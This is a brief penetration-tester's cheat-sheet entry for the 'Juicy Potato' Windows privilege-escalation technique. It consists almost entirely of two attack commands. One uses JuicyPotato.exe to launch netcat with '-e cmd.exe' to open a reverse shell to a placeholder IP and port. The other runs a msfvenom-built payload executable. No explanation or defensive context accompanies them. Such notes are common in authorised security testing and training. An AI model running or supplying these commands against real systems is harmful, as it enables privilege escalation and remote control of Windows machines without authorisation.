Juicy Potato

# using nc 
JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID

# using msfvenom 
Juicy.Potato.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID

Last updated